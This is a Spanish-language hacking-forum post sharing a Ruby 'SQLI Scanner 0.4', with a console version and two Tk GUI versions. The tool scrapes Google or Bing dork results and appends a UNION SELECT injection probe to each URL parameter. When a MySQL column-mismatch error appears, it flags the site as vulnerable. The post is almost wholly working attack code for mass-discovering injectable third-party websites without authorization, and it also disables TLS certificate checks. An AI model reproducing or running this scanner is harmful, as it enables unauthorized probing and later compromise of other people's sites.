elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Ruby] SQLI Scanner 0.4
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Ruby] SQLI Scanner 0.4  (Leído 1,835 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Ruby] SQLI Scanner 0.4
« en: 7 Agosto 2015, 22:25 pm »

Un simple script en Ruby para buscar páginas vulnerables a SQLI usando Google o Bing.

Version consola :

Código
  1. #!usr/bin/ruby
  2. #SQLI Scanner 0.4
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "open-uri"
  6. require "net/http"
  7. require "openssl"
  8.  
  9. # Functions
  10.  
  11. def toma(web)
  12. begin
  13. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  14. rescue
  15. return "Error"
  16. end
  17. end
  18.  
  19.  
  20. def toma_ssl(web)
  21. uri = URI.parse(web)
  22. nave = Net::HTTP.new(uri.host, uri.port)
  23. nave.use_ssl = true
  24. nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  25. return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
  26. end
  27.  
  28.  
  29. def tomar(web,arg)
  30. begin
  31. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  32. uri = URI(web)
  33. http = Net::HTTP.new(uri.host, uri.port)
  34. return http.post(uri.path,arg, headers).body
  35. rescue
  36. return "Error"
  37. end
  38. end
  39.  
  40. def cortar(pages)
  41. final = ""
  42. finales = []
  43. pages.flatten.each do |page|
  44. if page=~/(.*)=(.*)/
  45. parte1 = $1
  46. parte2 = $2
  47. final = parte1 + "="
  48. finales.push(final)
  49. end
  50. end
  51. return finales
  52. end
  53.  
  54.  
  55. def google(dork,pages)
  56.  
  57. links = []
  58. dork = dork.sub(/ /,"+")
  59. contador = 0
  60. for i in ("1"..pages)
  61. contador+=10
  62. code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
  63. paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
  64. paginas.flatten.each do |pagina|
  65. partes = pagina
  66. if partes=~/url\?q=(.*)&amp;sa/
  67. parte = $1
  68. link = URI::decode(parte)
  69. links.push(link)
  70. end
  71. end
  72. end
  73. links = links.uniq
  74. return links
  75. end
  76.  
  77. def google_recursive(dork,pages)
  78. dork = dork.sub(/ /,"+")
  79. contador = 0
  80. guardo = []
  81. for i in ("1"..pages)
  82. contador+=10
  83. url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
  84. code = toma_ssl(url)
  85. links = URI::extract(code)
  86. links.each do |link|
  87. if link=~/cache:(.*?):(.*?)\+/
  88. link_final = "http://"+$2
  89. link_final = URI::decode(link_final)
  90. guardo.push(link_final)
  91. end
  92. end
  93. end
  94. guardo = guardo.uniq
  95. return guardo
  96. end
  97.  
  98. def bing(dork,pages)
  99.  
  100. guardo = []
  101. dork = dork.sub(/ /,"+")
  102. contador = 0
  103. for i in ("1"..pages)
  104. contador+=10
  105.  
  106. code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
  107.  
  108. links = code.scan(/<h2><a href="(.*?)" h/)
  109.  
  110. links.flatten.each do |link|
  111. link_final = URI::decode(link)
  112. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  113. guardo.push(link_final)
  114. end
  115. end
  116.  
  117. links = code.scan(/<h3><a href="(.*?)" h/)
  118.  
  119. links.flatten.each do |link|
  120. link_final = URI::decode(link)
  121. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  122. guardo.push(link_final)
  123. end
  124. end
  125. end
  126. guardo = guardo.uniq
  127. return guardo
  128. end
  129.  
  130. def uso
  131. print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n"
  132. print "-search_bing : Find in Bing\n"
  133. print "-search_google : Find in Google\n"
  134. print "-scan_bing : Find SQLI in Bing\n"
  135. print "-scan_google : Find SQLI in Google\n"
  136. print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
  137. end
  138.  
  139. def  head
  140. print "\n\n-- == SQLI Scanner 0.4 == --\n\n"
  141. end
  142.  
  143. def copyright
  144. print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  145. end
  146.  
  147. opcion = ARGV[0]
  148. dork = ARGV[1]
  149. pages  = ARGV[2]
  150.  
  151. head()
  152.  
  153. if !opcion or !dork or !pages
  154. uso()
  155. else
  156.  
  157. if opcion=="-search_bing"
  158.  
  159. print "\n[+] Searching in Bing ...\n\n"
  160.  
  161. links = bing(dork,pages)
  162.  
  163. print "[+] Pages Count : "+links.count.to_s+"\n\n"
  164.  
  165. if links.count.to_s=="0"
  166. print "[-] Links not found\n"
  167. end
  168.  
  169. links.flatten.each do |link|
  170. print "[+] Link : "+link+"\n"
  171. end
  172.  
  173. print "\n[+] Finished\n"
  174.  
  175. elsif opcion=="-search_google"
  176.  
  177. print "\n[+] Searching in Google ...\n\n"
  178.  
  179. links = google(dork,pages)
  180.  
  181. if links.count.to_s=="0"
  182. print "[+] Searching in Google again ...\n\n"
  183. links = google_recursive(dork,pages)
  184. end
  185.  
  186. print "[+] Pages Count : "+links.count.to_s
  187.  
  188. if links.count.to_s=="0"
  189. print "[-] Links not found"
  190. end
  191.  
  192. links.flatten.each do |link|
  193. print "[+] Link : "+link+"\n"
  194. end
  195.  
  196. print "\n[+] Finished\n"
  197.  
  198. elsif opcion=="-scan_bing"
  199.  
  200. print "\n[+] Searching in Bing ...\n\n"
  201.  
  202. links = cortar(bing(dork,pages))
  203.  
  204. print "[+] Pages Count : "+links.count.to_s+"\n\n"
  205.  
  206. if links.count.to_s=="0"
  207. print "[-] Links not found\n"
  208. end
  209.  
  210. links.flatten.each do |link|
  211. print "[+] Link : "+link
  212. begin
  213. url = toma(link + "-1+union+select+1--")
  214. if url=~/The used SELECT statements have a different number of columns/
  215. print " [OK]\n\a\a"
  216. else
  217. print " [FAIL]\n"
  218. end
  219. rescue
  220. print " [FAIL]\n"
  221. end
  222. end
  223.  
  224. print "\n[+] Finished\n"
  225.  
  226. elsif opcion=="-scan_google"
  227.  
  228. print "\n[+] Searching in Google ...\n\n"
  229.  
  230. links = cortar(google(dork,pages))
  231.  
  232. if links.count.to_s=="0"
  233. print "[+] Searching in Google again ...\n\n"
  234. links = cortar(google_recursive(dork,pages))
  235. end
  236.  
  237. print "[+] Pages Count : "+links.count.to_s+"\n\n"
  238.  
  239. if links.count.to_s=="0"
  240. print "[-] Links not found"
  241. end
  242.  
  243. links.flatten.each do |link|
  244. print "[+] Link : "+link
  245. begin
  246. url = toma(link + "-1+union+select+1--")
  247. if url=~/The used SELECT statements have a different number of columns/
  248. print " [OK]\n\a\a"
  249. else
  250. print " [FAIL]\n"
  251. end
  252. rescue
  253. print " [FAIL]\n"
  254. end
  255. end
  256.  
  257. print "\n[+] Finished\n"
  258. else
  259. print "[-] Bad Option"
  260. end
  261. end
  262.  
  263. copyright()
  264.  
  265.  
  266. #The End ?
  267.  

Version Tk para Google :

Código
  1. #!usr/bin/ruby
  2. #SQLI Scanner 0.4
  3. #(C) Doddy Hackman 2015
  4. #Scan Google Tk
  5.  
  6. require "tk"
  7. require "open-uri"
  8. require "net/http"
  9. require "openssl"
  10.  
  11. # Functions
  12.  
  13. def toma(web)
  14. begin
  15. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  16. rescue
  17. return "Error"
  18. end
  19. end
  20.  
  21.  
  22. def toma_ssl(web)
  23. uri = URI.parse(web)
  24. nave = Net::HTTP.new(uri.host, uri.port)
  25. nave.use_ssl = true
  26. nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  27. return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
  28. end
  29.  
  30.  
  31. def tomar(web,arg)
  32. begin
  33. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  34. uri = URI(web)
  35. http = Net::HTTP.new(uri.host, uri.port)
  36. return http.post(uri.path,arg, headers).body
  37. rescue
  38. return "Error"
  39. end
  40. end
  41.  
  42. def cortar(pages)
  43. final = ""
  44. finales = []
  45. pages.flatten.each do |page|
  46. if page=~/(.*)=(.*)/
  47. parte1 = $1
  48. parte2 = $2
  49. final = parte1 + "="
  50. finales.push(final)
  51. end
  52. end
  53. return finales
  54. end
  55.  
  56.  
  57. def google(dork,pages)
  58.  
  59. links = []
  60. dork = dork.sub(/ /,"+")
  61. contador = 0
  62. for i in ("1"..pages)
  63. contador+=10
  64. code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
  65. paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
  66. paginas.flatten.each do |pagina|
  67. partes = pagina
  68. if partes=~/url\?q=(.*)&amp;sa/
  69. parte = $1
  70. link = URI::decode(parte)
  71. links.push(link)
  72. end
  73. end
  74. end
  75. links = links.uniq
  76. return links
  77. end
  78.  
  79. def google_recursive(dork,pages)
  80. dork = dork.sub(/ /,"+")
  81. contador = 0
  82. guardo = []
  83. for i in ("1"..pages)
  84. contador+=10
  85. url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
  86. code = toma_ssl(url)
  87. links = URI::extract(code)
  88. links.each do |link|
  89. if link=~/cache:(.*?):(.*?)\+/
  90. link_final = "http://"+$2
  91. link_final = URI::decode(link_final)
  92. guardo.push(link_final)
  93. end
  94. end
  95. end
  96. guardo = guardo.uniq
  97. return guardo
  98. end
  99.  
  100. def bing(dork,pages)
  101.  
  102. guardo = []
  103. dork = dork.sub(/ /,"+")
  104. contador = 0
  105. for i in ("1"..pages)
  106. contador+=10
  107.  
  108. code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
  109.  
  110. links = code.scan(/<h2><a href="(.*?)" h/)
  111.  
  112. links.flatten.each do |link|
  113. link_final = URI::decode(link)
  114. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  115. guardo.push(link_final)
  116. end
  117. end
  118.  
  119. links = code.scan(/<h3><a href="(.*?)" h/)
  120.  
  121. links.flatten.each do |link|
  122. link_final = URI::decode(link)
  123. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  124. guardo.push(link_final)
  125. end
  126. end
  127. end
  128. guardo = guardo.uniq
  129. return guardo
  130. end
  131.  
  132. #
  133.  
  134. window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
  135. window['geometry'] = '300x320-20+10'
  136.  
  137. TkLabel.new(window) do
  138. background "black"
  139. foreground "green"
  140. text "    Dork : "
  141. place('relx'=>"0.1",'rely'=>"0.1")
  142. end
  143.  
  144. dork = TkEntry.new(window){
  145. background "black"
  146. foreground "green"
  147. width 25
  148. place('relx'=>0.3,'rely'=>0.1)
  149. }
  150.  
  151. TkLabel.new(window) do
  152. background "black"
  153. foreground "green"
  154. text "    Pages : "
  155. place('relx'=>"0.1",'rely'=>"0.2")
  156. end
  157.  
  158. pages = TkEntry.new(window){
  159. background "black"
  160. foreground "green"
  161. width 25
  162. place('relx'=>0.3,'rely'=>0.2)
  163. }
  164.  
  165. TkLabel.new(window) do
  166. background "black"
  167. foreground "green"
  168. text "Console"
  169. place('relx'=>0.4,'rely'=>0.3)
  170. end
  171.  
  172. console =TkText.new(window) do
  173. background "black"
  174. foreground "green"
  175. width 30
  176. height 9
  177. place('relx'=>0.1,'rely'=>0.4)
  178. end
  179.  
  180. TkButton.new(window) do
  181. text "Search"
  182.    background "black"
  183. foreground "green"
  184. width 17
  185. activebackground "green"
  186. highlightbackground  "green"
  187. command proc{
  188.  
  189. dork = dork.value.to_s
  190. pages = pages.value.to_s
  191.  
  192. console.insert("end",  "[+] Searching in Google ...\n\n")
  193.  
  194. links = cortar(google(dork,pages))
  195.  
  196. if links.count.to_s=="0"
  197. console.insert("end",  "[+] Searching in Google again ...\n\n")
  198. links = cortar(google_recursive(dork,pages))
  199. end
  200.  
  201. console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
  202.  
  203. if links.count.to_s=="0"
  204. console.insert("end", "[-] Links not found")
  205. end
  206.  
  207. links.flatten.each do |link|
  208. console.insert("end", "[+] Link : "+link)
  209. begin
  210. url = toma(link + "-1+union+select+1--")
  211. if url=~/The used SELECT statements have a different number of columns/
  212. console.insert("end"," [OK]\n\a\a")
  213. else
  214. console.insert("end"," [FAIL]\n")
  215. end
  216. rescue
  217. console.insert("end", " [FAIL]\n")
  218. end
  219. end
  220.  
  221. console.insert("end",  "\n[+] Finished")
  222.  
  223. }
  224. place('relx'=>0.3,'rely'=>0.9)
  225. end
  226.  
  227. Tk.mainloop
  228.  
  229. #The End ?
  230.  

Una imagen :



Version Tk para Bing :

Código
  1. #!usr/bin/ruby
  2. #SQLI Scanner 0.4
  3. #(C) Doddy Hackman 2015
  4. #Scan Bing Tk
  5.  
  6. require "tk"
  7. require "open-uri"
  8. require "net/http"
  9. require "openssl"
  10.  
  11. # Functions
  12.  
  13. def toma(web)
  14. begin
  15. return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  16. rescue
  17. return "Error"
  18. end
  19. end
  20.  
  21.  
  22. def toma_ssl(web)
  23. uri = URI.parse(web)
  24. nave = Net::HTTP.new(uri.host, uri.port)
  25. nave.use_ssl = true
  26. nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  27. return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
  28. end
  29.  
  30.  
  31. def tomar(web,arg)
  32. begin
  33. headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  34. uri = URI(web)
  35. http = Net::HTTP.new(uri.host, uri.port)
  36. return http.post(uri.path,arg, headers).body
  37. rescue
  38. return "Error"
  39. end
  40. end
  41.  
  42. def cortar(pages)
  43. final = ""
  44. finales = []
  45. pages.flatten.each do |page|
  46. if page=~/(.*)=(.*)/
  47. parte1 = $1
  48. parte2 = $2
  49. final = parte1 + "="
  50. finales.push(final)
  51. end
  52. end
  53. return finales
  54. end
  55.  
  56.  
  57. def google(dork,pages)
  58.  
  59. links = []
  60. dork = dork.sub(/ /,"+")
  61. contador = 0
  62. for i in ("1"..pages)
  63. contador+=10
  64. code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
  65. paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
  66. paginas.flatten.each do |pagina|
  67. partes = pagina
  68. if partes=~/url\?q=(.*)&amp;sa/
  69. parte = $1
  70. link = URI::decode(parte)
  71. links.push(link)
  72. end
  73. end
  74. end
  75. links = links.uniq
  76. return links
  77. end
  78.  
  79. def google_recursive(dork,pages)
  80. dork = dork.sub(/ /,"+")
  81. contador = 0
  82. guardo = []
  83. for i in ("1"..pages)
  84. contador+=10
  85. url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
  86. code = toma_ssl(url)
  87. links = URI::extract(code)
  88. links.each do |link|
  89. if link=~/cache:(.*?):(.*?)\+/
  90. link_final = "http://"+$2
  91. link_final = URI::decode(link_final)
  92. guardo.push(link_final)
  93. end
  94. end
  95. end
  96. guardo = guardo.uniq
  97. return guardo
  98. end
  99.  
  100. def bing(dork,pages)
  101.  
  102. guardo = []
  103. dork = dork.sub(/ /,"+")
  104. contador = 0
  105. for i in ("1"..pages)
  106. contador+=10
  107.  
  108. code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
  109.  
  110. links = code.scan(/<h2><a href="(.*?)" h/)
  111.  
  112. links.flatten.each do |link|
  113. link_final = URI::decode(link)
  114. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  115. guardo.push(link_final)
  116. end
  117. end
  118.  
  119. links = code.scan(/<h3><a href="(.*?)" h/)
  120.  
  121. links.flatten.each do |link|
  122. link_final = URI::decode(link)
  123. if not link_final=~/http:\/\/778802\.r\.msn\.com\//
  124. guardo.push(link_final)
  125. end
  126. end
  127. end
  128. guardo = guardo.uniq
  129. return guardo
  130. end
  131.  
  132. #
  133.  
  134. window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
  135. window['geometry'] = '300x320-20+10'
  136.  
  137. TkLabel.new(window) do
  138. background "black"
  139. foreground "green"
  140. text "    Dork : "
  141. place('relx'=>"0.1",'rely'=>"0.1")
  142. end
  143.  
  144. dork = TkEntry.new(window){
  145. background "black"
  146. foreground "green"
  147. width 25
  148. place('relx'=>0.3,'rely'=>0.1)
  149. }
  150.  
  151. TkLabel.new(window) do
  152. background "black"
  153. foreground "green"
  154. text "    Pages : "
  155. place('relx'=>"0.1",'rely'=>"0.2")
  156. end
  157.  
  158. pages = TkEntry.new(window){
  159. background "black"
  160. foreground "green"
  161. width 25
  162. place('relx'=>0.3,'rely'=>0.2)
  163. }
  164.  
  165. TkLabel.new(window) do
  166. background "black"
  167. foreground "green"
  168. text "Console"
  169. place('relx'=>0.4,'rely'=>0.3)
  170. end
  171.  
  172. console =TkText.new(window) do
  173. background "black"
  174. foreground "green"
  175. width 30
  176. height 9
  177. place('relx'=>0.1,'rely'=>0.4)
  178. end
  179.  
  180. TkButton.new(window) do
  181. text "Search"
  182.    background "black"
  183. foreground "green"
  184. width 17
  185. activebackground "green"
  186. highlightbackground  "green"
  187. command proc{
  188.  
  189. dork = dork.value.to_s
  190. pages = pages.value.to_s
  191.  
  192. console.insert("end", "[+] Searching in Bing ...\n\n")
  193.  
  194. links = cortar(bing(dork,pages))
  195.  
  196. console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
  197.  
  198. if links.count.to_s=="0"
  199. console.insert("end","[-] Links not found\n")
  200. end
  201.  
  202. links.flatten.each do |link|
  203. console.insert("end", "[+] Link : "+link)
  204. begin
  205. url = toma(link + "-1+union+select+1--")
  206. if url=~/The used SELECT statements have a different number of columns/
  207. console.insert("end"," [OK]\n\a\a")
  208. else
  209. console.insert("end", " [FAIL]\n")
  210. end
  211. rescue
  212. console.insert("end"," [FAIL]\n")
  213. end
  214. end
  215.  
  216. console.insert("end",  "\n[+] Finished")
  217.  
  218. }
  219. place('relx'=>0.3,'rely'=>0.9)
  220. end
  221.  
  222. Tk.mainloop
  223.  
  224. #The End ?
  225.  

Una imagen :



Eso es todo.


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Ruby] SQLI Scanner
Scripting
BigBear 0 2,103 Último mensaje 7 Octubre 2011, 01:32 am
por BigBear
[Java] SQLI Scanner 0.2
Java
BigBear 1 2,948 Último mensaje 22 Enero 2013, 16:27 pm
por Slider324
[C#] SQLI Scanner 0.4
.NET (C#, VB.NET, ASP)
BigBear 0 2,847 Último mensaje 18 Julio 2014, 01:36 am
por BigBear
[Ruby] LFI Scanner 0.3
Scripting
BigBear 0 1,740 Último mensaje 21 Agosto 2015, 23:37 pm
por BigBear
[Java] SQLI Scanner 0.4
Java
BigBear 0 1,577 Último mensaje 5 Marzo 2016, 16:15 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines